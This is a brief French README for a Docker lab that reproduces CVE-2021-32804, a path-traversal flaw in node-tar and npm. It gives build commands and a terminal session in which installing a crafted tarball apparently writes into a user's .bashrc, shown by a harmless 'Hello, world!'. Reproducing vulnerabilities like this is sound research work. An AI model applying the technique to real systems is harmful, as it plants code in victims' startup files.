
Environnement de reproduction basé sur Docker pour CVE-2021-32804, une vulnérabilité de traversée de chemin dans node-tar affectant npm, avec des scripts d'exploitation pas à pas.
Dépôt pour construire l'environnement Docker utilisé dans l'article du blog yamory « CVE-2021-32804 Vulnérabilité de path traversal dans node-tar affectant également npm ».
docker build -t cve-2021-32804 .
docker run -it cve-2021-32804 /bin/bash
root@5e1af2148215:/poc# node tar.js
root@5e1af2148215:/poc# su node
Hello, world!
root@5e1af2148215:/poc# npm i bashrc.tgz
root@5e1af2148215:/poc# su node
Hello, world!